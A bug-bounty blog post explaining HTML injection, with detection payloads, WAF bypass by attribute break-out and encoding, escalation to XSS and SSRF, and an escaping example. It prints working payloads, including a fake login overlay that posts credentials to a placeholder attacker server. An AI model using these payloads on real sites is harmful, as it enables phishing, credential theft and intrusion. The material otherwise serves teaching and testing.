Research on HTML Injection

Prajit Sindhkar
3 min read · Jan 8, 2022

Hello guys👋👋, Prajit here from the BUG XS Team and a Cybersecurity and Red Team Intern at Cyber Sapiens United LLP. In this internship I am regularly given some interesting tasks; in my ninth task I was asked to research the HTML Injection vulnerability and write a report about it.

What is HTML Injection?

HTML Injection, also termed “virtual defacement”, is one of the simplest and most common vulnerabilities. It arises when a web page fails to sanitize user-supplied input or to validate its output, which allows an attacker to craft payloads and inject HTML markup into the application through the vulnerable fields, so that he can modify the web page content and even capture sensitive data.

When an application does not properly handle user-supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as it exploits both a code-based vulnerability and a user’s trust.

The latest HTML version is HTML 5.

How to Detect HTML Injection?

You can detect HTML injection by first finding parameters and endpoints that take user input and reflect it back on the client side. Note that the injection point can be in one place while the reflection appears somewhere else, so remember to look thoroughly.

The following payloads can be used to find it:

1. <h1>SAPT</h1> and <h6>SAPT</h6>: inject both and compare how they render.

2. <img src=img_url>: check if the given image is injected.

3. <a href=https://evil.com>ClickHere</a>: check if the link is injected.

While trying this you may well be blocked, or filtering techniques may be in place. So should you give up? No, we also have some methods to bypass these features.

1. My favourite technique for manual hunting of this is “Query Balancing”; it applies to XSS too, not only to HTML Injection.

For your input (idnf), suppose the HTML source is as follows:

<input type="text" value="idnf">

In such cases, to escape the value attribute you have to start your payload with ">

What happens? The "> actually closes the input element before our payload, so our input is no longer stored in the “value” attribute and the rest of the payload acts as an open string. If the web application firewall is checking only the content of the value attribute, there is nothing suspicious there and the request passes, but the rest of the payload lands in the web application, which treats it as part of the page’s code and renders it. Hence bypassed.

2. You can also encode your payload before injecting it, for example with base64 or URL encoding. This sometimes bypasses the filters.

What are the Different Types of HTML Injection?

1. Reflected HTML Injection

When you inject an HTML payload and it is shown only at that moment; as soon as the page reloads, the injection goes away. It is generally found in GET parameters and sometimes in POST parameters too.

2. Stored HTML Injection

When you inject an HTML payload and it stays there until it is changed, even if you log out of your account and come back; hence it is stored.

3. Email HTML Injection

When the content of emails arriving in your mailbox is injected with HTML payloads, it is known as Email HTML Injection. This is rated P4 according to the Bugcrowd VRT.

What are the Exploit Scenarios / Escalation For HTML Injection?

1. The most basic exploit is to use HTML injection as a medium for social engineering. It can be done by injecting a link:

<a href=https://evil.com>ClickHere for Rewards</a>

Or by injecting a complete form:

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid

credentials:<br><form name="login" action="http://YOURSERVER/login.htm">

<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>

<td><input type="text" name="password"/></td></tr><tr>

<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>

</table></form>

2. HTML Injection can also be escalated to XSS, which is pretty common. E.g. the payload <IMG SRC=JaVaScRiPt:alert('XSS')> can be used for this.

3. HTML Injection to SSRF via <iframe> tags. E.g. the payload <iframe src="http://BURP-COLLABORATOR-URL"></iframe> can be used.

Since it is SSRF, it can sometimes also be used to read server files like /etc/passwd, drastically changing the severity.

How to Mitigate HTML Injection Vulnerability?

The best way to mitigate this is to properly filter user input and to block (or escape) HTML metacharacters before the input is rendered in the page.
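As an added example (not code from the original post), the snippet below shows the “Query Balancing” break-out described earlier against the <input type="text" value="idnf"> source, and how escaping the HTML metacharacters in the output keeps the injected value inside the attribute. The render functions, the payload and the tag-counting check are constructed for illustration.

```javascript
// Added example: contextual output encoding against the "> attribute break-out.
// Sample inputs are constructed; renderVulnerable/renderHardened are illustrative.

// Entity forms for the five HTML metacharacters that matter in text and
// attribute contexts.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Replace each metacharacter with its entity so the browser treats the
// value as data, never as markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the raw value is interpolated into the attribute,
// matching the source shown in the post.
function renderVulnerable(idnf) {
  return `<input type="text" value="${idnf}">`;
}

// Hardened rendering: the value is encoded before it lands in the attribute,
// so a leading "> cannot close the element.
function renderHardened(idnf) {
  return `<input type="text" value="${escapeHtml(idnf)}">`;
}

// Counts opening tags in the rendered markup. A clean render contains one
// <input>; anything beyond that means the input escaped the attribute.
// (A simple regex check for the demo, not an HTML parser.)
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Constructed payload in the style of the post: close the attribute with ">,
// then inject a heading.
const PAYLOAD = '"><h1>SAPT</h1>';

console.log('vulnerable:', renderVulnerable(PAYLOAD), 'tags =', countTags(renderVulnerable(PAYLOAD)));
console.log('hardened:  ', renderHardened(PAYLOAD), 'tags =', countTags(renderHardened(PAYLOAD)));
```

A filter that inspects only the value attribute sees nothing wrong in the vulnerable render, which is exactly why encoding at the output point rather than relying on a perimeter filter is the fix.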

This is all for today’s writeup.

Thanks For Reading 😊

Profile Links:

Twitter: https://twitter.com/SAPT01

LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/

Instagram: https://instagram.com/prajit_01?utm_medium=copy_link

BUG XS Official Website: https://www.bugxs.co/


Prajit Sindhkar

I am an India-based Security Researcher, Bugcrowd Top 500 Hacker and Bug Bounty Leader of the BUGXS Community